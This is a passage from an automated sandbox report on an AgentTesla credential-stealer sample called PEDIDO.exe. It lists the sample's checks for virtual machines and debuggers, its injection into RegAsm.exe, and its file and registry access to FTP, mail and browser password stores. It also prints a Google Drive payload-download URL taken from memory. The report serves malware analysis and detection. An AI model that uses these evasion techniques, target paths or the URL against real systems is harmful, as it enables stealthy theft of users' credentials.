Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\PEDIDO.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\PEDIDO.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: PEDIDO.exe, 00000001.00000002.69378136579.0000000002AC0000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.74031185324.0000000000DB0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: RegAsm.exe, 00000006.00000002.74031185324.0000000000DB0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1G3ZUBGFP3XG7UQ2AO6_GNM0HCT-90HBP
Source: PEDIDO.exe, 00000001.00000002.69378136579.0000000002AC0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
Source: PEDIDO.exe, 00000001.00000002.69377229117.0000000000763000.00000004.00000020.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEX;V
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5260 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 9948 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\PEDIDO.exe System information queried: ModuleInformation Jump to behavior
Source: PEDIDO.exe, 00000001.00000002.69379627372.0000000004CC9000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.74033795258.00000000028F9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: RegAsm.exe, 00000006.00000002.74031185324.0000000000DB0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=https://drive.google.com/uc?export=download&id=1G3zuBgFp3XG7uq2Ao6_gnm0hCT-90hBP
Source: PEDIDO.exe, 00000001.00000002.69379627372.0000000004CC9000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.74033795258.00000000028F9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: RegAsm.exe, 00000006.00000002.74033795258.00000000028F9000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: PEDIDO.exe, 00000001.00000002.69378136579.0000000002AC0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
Source: PEDIDO.exe, 00000001.00000002.69379627372.0000000004CC9000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.74033795258.00000000028F9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: PEDIDO.exe, 00000001.00000002.69379627372.0000000004CC9000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.74033795258.00000000028F9000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: PEDIDO.exe, 00000001.00000002.69379627372.0000000004CC9000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.74033795258.00000000028F9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: PEDIDO.exe, 00000001.00000002.69377229117.0000000000763000.00000004.00000020.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exex;v
Source: RegAsm.exe, 00000006.00000002.74033795258.00000000028F9000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: RegAsm.exe, 00000006.00000002.74031926505.0000000000EB8000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: PEDIDO.exe, 00000001.00000002.69378136579.0000000002AC0000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.74031185324.0000000000DB0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: PEDIDO.exe, 00000001.00000002.69379627372.0000000004CC9000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.74033795258.00000000028F9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: PEDIDO.exe, 00000001.00000002.69379627372.0000000004CC9000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.74033795258.00000000028F9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: PEDIDO.exe, 00000001.00000002.69379627372.0000000004CC9000.00000004.00000001.sdmp, RegAsm.exe, 00000006.00000002.74033795258.00000000028F9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: RegAsm.exe, 00000006.00000002.74033795258.00000000028F9000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\PEDIDO.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread information set: HideFromDebugger Jump to behavior
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\PEDIDO.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00A46950 LdrInitializeThunk, 6_2_00A46950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Writes to foreign memory regions
Source: C:\Users\user\Desktop\PEDIDO.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B30000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\PEDIDO.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe' Jump to behavior
Source: C:\Users\user\Desktop\PEDIDO.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe' Jump to behavior
Source: C:\Users\user\Desktop\PEDIDO.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe' Jump to behavior
Source: C:\Users\user\Desktop\PEDIDO.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\PEDIDO.exe' Jump to behavior
Source: RegAsm.exe, 00000006.00000002.74033374769.00000000014A1000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: RegAsm.exe, 00000006.00000002.74033374769.00000000014A1000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 00000006.00000002.74033374769.00000000014A1000.00000002.00020000.sdmp Binary or memory string: Progman
Source: RegAsm.exe, 00000006.00000002.74033374769.00000000014A1000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected AgentTesla
Source: Yara match File source: 00000006.00000002.74041380442.000000001DC01000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 428, type: MEMORYSTR
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Tries to steal Mail credentials (via file access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000006.00000002.74041380442.000000001DC01000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 428, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected AgentTesla
Source: Yara match File source: 00000006.00000002.74041380442.000000001DC01000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 428, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs